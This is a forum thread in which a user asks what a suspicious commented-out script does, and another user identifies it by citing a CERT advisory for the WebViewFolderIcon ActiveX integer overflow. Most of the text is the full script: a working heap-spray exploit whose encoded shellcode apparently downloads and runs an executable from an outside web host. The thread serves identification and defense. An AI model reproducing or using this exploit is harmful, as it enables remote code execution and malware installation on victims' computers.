What is this script doing?

V

V S Rawat

Could someone please give me some idea what this script is doing.

It might be some malicious script that might have been used to spread
virus or to hack username/ password, hence it has been ### so that it
can't be run by default.

thanks.

<!-- <html>
###<body>
###<script>
### var heapSprayToAddress = 0x05050505;
### var shellcode = unescape("%u9090"+"%u9090"+
###"%u54eb%u758b%u8b3c%u3574%u0378%u56f5%u768b%u0320" +
###"%u33f5%u49c9%uad41%udb33%u0f36%u14be%u3828%u74f2" +
###"%uc108%u0dcb%uda03%ueb40%u3bef%u75df%u5ee7%u5e8b" +
###"%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b" +
###"%uc3c5%u7275%u6d6c%u6e6f%u642e%u6c6c%u4300%u5c3a" +
###"%u2e55%u7865%u0065%uc033%u0364%u3040%u0c78%u408b" +
###"%u8b0c%u1c70%u8bad%u0840%u09eb%u408b%u8d34%u7c40" +
###"%u408b%u953c%u8ebf%u0e4e%ue8ec%uff84%uffff%uec83" +
###"%u8304%u242c%uff3c%u95d0%ubf50%u1a36%u702f%u6fe8" +
###"%uffff%u8bff%u2454%u8dfc%uba52%udb33%u5353%ueb52" +
###"%u5324%ud0ff%ubf5d%ufe98%u0e8a%u53e8%uffff%u83ff" +
###"%u04ec%u2c83%u6224%ud0ff%u7ebf%ue2d8%ue873%uff40" +
###"%uffff%uff52%ue8d0%uffd7%uffff%u7468%u7074%u2f3a" +
###"%u6d2f%u686f%u6973%u776e%u6265%u6973%u6574%u632e" +
###"%u2e6f%u6b75%u622f%u6e69%u3264%u652e%u6578%u0000");
###var heapBlockSize = 0x400000;
###var payLoadSize = shellcode.length * 2;
###var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
###var spraySlide = unescape("%u0505%u0505");
###spraySlide = getSpraySlide(spraySlide,spraySlideSize);
###heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
###memory = new Array();
###
###for (i=0;i<heapBlocks;i++)
###{
### memory = spraySlide + shellcode;
###}
###for ( i = 0 ; i < 128 ; i++)
###{
### try
### {
### var tar = new
ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
### tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
### }
### catch(e){}
###}
###
###function getSpraySlide(spraySlide, spraySlideSize)
###{
### while (spraySlide.length*2<spraySlideSize)
### {
### spraySlide += spraySlide;
### }
### spraySlide = spraySlide.substring(0,spraySlideSize/2);
### return spraySlide;
###}
###
###</script>
###</body>
###</html>
### -->
--
 
D

denisb

V S Rawat said:
Could someone please give me some idea what this script is doing.
[snip]

### var tar = new
ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
### tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
Click to expand...

"The Microsoft Windows WebViewFolderIcon ActiveX control contains an
integer overflow vulnerability. This may allow a remote, unauthenticated
attacker to execute arbitrary code on a vulnerable system."

in <http://www.kb.cert.org/vuls/id/753044>
 

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.

Ask a Question

Similar Threads

What do you think about this script? 0
Help me sort out this script 1
Issue with textbox script? 0
JavaScript: how to keep track of the circle in canvas on specific path? 0
Can someone tell me if this a real tracker? Or is it one designed to show you a different message at certain times, ie. acting like one? 0
Filename undefined for Blob ? 1
Large, Filled Arrays: What is Happening? 9
Why is this WordPress comments form not submitting? 1

Members online

Total: 29 (members: 1, guests: 28)
Robots: 486

Forum statistics

Threads
473,769
Messages
2,569,579
Members
45,053
Latest member
BrodieSola

Latest Threads

Top